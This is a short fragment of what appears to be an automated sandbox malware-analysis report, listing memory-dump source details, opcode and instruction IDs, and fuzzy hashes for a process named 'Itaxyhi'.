                                                                                  • Opcode Fuzzy Hash: 462b105f366e6832f06827270aba95fcff0877c214c04ce996d9180b3d1319ce
                                                                                  • Instruction Fuzzy Hash: 5051E467B0DA921BE362976C5CF60DABF94EF1336870900B6C798CB193ED1D340B5692
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 801f30008f8fe8f9e46c489ba483b48c5a338730fad761bcbe39225c07008ac8
                                                                                  • Instruction ID: c3b3f005eed55d7e35cb4e3c15b9859e1681e3c6d5538799932f94b1cb8c2f8f
                                                                                  • Opcode Fuzzy Hash: 801f30008f8fe8f9e46c489ba483b48c5a338730fad761bcbe39225c07008ac8
                                                                                  • Instruction Fuzzy Hash: C5512C53F0FAD35BF6925B681CF60996B90EF23354B0880B6C568D70C3DD4DB40AA1A5